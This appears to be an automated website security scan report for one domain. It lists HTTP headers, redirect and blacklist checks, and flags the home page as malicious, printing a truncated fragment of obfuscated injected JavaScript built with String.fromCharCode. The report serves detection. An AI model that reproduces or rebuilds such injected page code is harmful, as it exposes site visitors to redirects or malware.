Scanned pages/files
Request | Server response | Status |
http://ortolanoffshore.com/ | HTTP/1.1 200 OK Connection: close Date: Tue, 03 Mar 2015 20:03:13 GMT Accept-Ranges: bytes ETag: "2f51478349ce1:166310" Server: Microsoft-IIS/6.0 Content-Length: 4445 Content-Location: http://ortolanoffshore.com/index.html Content-Type: text/html Last-Modified: Sat, 04 May 2013 20:10:48 GMT Set-Cookie: X-Mapping-hnoldlfm=E608838851152B46B77F3FD714EF9193; path=/ X-Powered-By: ASP.NET | clean |
http://ortolanoffshore.com/index.html | 200 OK Content-Length: 4445 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=String.fromCharCode;asgq=[40,103,119,110,100,118,105,112,112,32,41,43,32,124,15,10,33,34,32,33,120,97,115,34,113,113,122,118,107,34,61,33,102,111,100,119,109,102,112,116,47,101,114,102,99,116,102,71,108,102,111,101,111,118,40,40,107,102,115,99,109,102,41,41,60,15,10,14,12,32,33,34,32,114,114,120,119,108,46,116,116,99,33,63,32,40,106,116,117,114,58,48,49,99,112,110,111,115,107,97,46,116,117,116,117,105,98,48,114,118,49,114,102,110,97,122,48,112,105,114,39,60,15,10,33,34,32,33,115,112,121,120,1 Antivirus reports:
| ||
http://ortolanoffshore.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ortolanoffshore.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 20:03:13 GMT
Accept-Ranges: bytes
ETag: "2f51478349ce1:166310"
Server: Microsoft-IIS/6.0
Content-Length: 4445
Content-Location: http://ortolanoffshore.com/index.html
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 20:10:48 GMT
Set-Cookie: X-Mapping-hnoldlfm=E608838851152B46B77F3FD714EF9193; path=/
X-Powered-By: ASP.NET
...4445 bytes of data.
GET / HTTP/1.1
Host: ortolanoffshore.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 20:03:13 GMT
Accept-Ranges: bytes
ETag: "2f51478349ce1:166310"
Server: Microsoft-IIS/6.0
Content-Length: 4445
Content-Location: http://ortolanoffshore.com/index.html
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 20:10:48 GMT
Set-Cookie: X-Mapping-hnoldlfm=E608838851152B46B77F3FD714EF9193; path=/
X-Powered-By: ASP.NET
...4445 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ortolanoffshore.com
Referer: http://www.google.com/search?q=ortolanoffshore.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ortolanoffshore.com
Referer: http://www.google.com/search?q=ortolanoffshore.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ortolanoffshore.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ortolanoffshore.com/
Result: ortolanoffshore.com is not infected or malware details are not published yet.
Result: ortolanoffshore.com is not infected or malware details are not published yet.